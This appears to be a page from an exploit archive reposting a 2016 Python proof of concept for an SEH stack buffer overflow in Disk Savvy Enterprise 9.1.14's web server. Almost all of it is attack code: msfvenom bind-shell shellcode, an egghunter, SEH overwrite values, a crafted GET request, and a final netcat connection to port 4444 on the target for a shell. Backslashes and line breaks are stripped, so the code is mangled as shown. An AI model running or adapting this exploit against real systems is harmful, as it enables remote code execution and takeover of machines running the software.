Home / exploits Disk Savvy Enterprise 9.1.14 GET Buffer Overflow
Posted on 01 December 2016
#!/usr/bin/python import socket,os,time #SEH Stack Overflow in GET request #Disk Savvy Enterprise 9.1.14 #Tested on Windows XP SP3 && Windows 7 Professional host = "192.168.1.20" port = 80 #badchars x00x09x0ax0dx20 #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "x00x09x0ax0dx20" -f python buf = "" buf += "xb8x3cxb1x1ex1dxd9xc8xd9x74x24xf4x5ax33" buf += "xc9xb1x53x83xc2x04x31x42x0ex03x7exbfxfc" buf += "xe8x82x57x82x13x7axa8xe3x9ax9fx99x23xf8" buf += "xd4x8ax93x8axb8x26x5fxdex28xbcx2dxf7x5f" buf += "x75x9bx21x6ex86xb0x12xf1x04xcbx46xd1x35" buf += "x04x9bx10x71x79x56x40x2axf5xc5x74x5fx43" buf += "xd6xffx13x45x5ex1cxe3x64x4fxb3x7fx3fx4f" buf += "x32x53x4bxc6x2cxb0x76x90xc7x02x0cx23x01" buf += "x5bxedx88x6cx53x1cxd0xa9x54xffxa7xc3xa6" buf += "x82xbfx10xd4x58x35x82x7ex2axedx6ex7exff" buf += "x68xe5x8cxb4xffxa1x90x4bxd3xdaxadxc0xd2" buf += "x0cx24x92xf0x88x6cx40x98x89xc8x27xa5xc9" buf += "xb2x98x03x82x5fxccx39xc9x37x21x70xf1xc7" buf += "x2dx03x82xf5xf2xbfx0cxb6x7bx66xcbxb9x51" buf += "xdex43x44x5ax1fx4ax83x0ex4fxe4x22x2fx04" buf += "xf4xcbxfaxb1xfcx6ax55xa4x01xccx05x68xa9" buf += "xa5x4fx67x96xd6x6fxadxbfx7fx92x4exaex23" buf += "x1bxa8xbaxcbx4dx62x52x2exaaxbbxc5x51x98" buf += "x93x61x19xcax24x8ex9axd8x02x18x11x0fx97" buf += "x39x26x1axbfx2exb1xd0x2ex1dx23xe4x7axf5" buf += "xc0x77xe1x05x8ex6bxbex52xc7x5axb7x36xf5" buf += "xc5x61x24x04x93x4axecxd3x60x54xedx96xdd" buf += "x72xfdx6exddx3exa9x3ex88xe8x07xf9x62x5b" buf += "xf1x53xd8x35x95x22x12x86xe3x2ax7fx70x0b" buf += "x9axd6xc5x34x13xbfxc1x4dx49x5fx2dx84xc9" buf += "x6fx64x84x78xf8x21x5dx39x65xd2x88x7ex90" buf += "x51x38xffx67x49x49xfax2cxcdxa2x76x3cxb8" buf += "xc4x25x3dxe9" egghunter = ("x66x81xcaxffx0fx42x52x6a"+ "x02x58xcdx2ex3cx05x5ax74xefxb8x77"+ "x30x30x74x8bxfaxafx75xeaxafx75xe7"+ "xffxe7") seh = "xc0x42x11x10" #pop pop ret [libspp.dll] nseh = "xebx06x90x90" #jmp short +0x8 egg = "w00tw00t" offset = 551 buffer_size = 5000 crash = "x41"*10 + egg + "x90"*2 crash += buf + "x90"*(offset-20-len(buf)) crash += nseh + seh + "x90"*8 crash += egghunter + "x44"*(buffer_size-offset-16-len(egghunter)) request = "GET /" + crash + "HTTP/1.1" + " " request += "Host: " + host + " " request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + " " request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + " " request += "Accept-Language: en-US,en;q=0.5" + " " request += "Accept-Encoding: gzip, deflate" + " " request += "Connection: keep-alive" + " " s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(request) s.close() print "Waiting for shell..." time.sleep(5) os.system("nc " + host + " 4444")
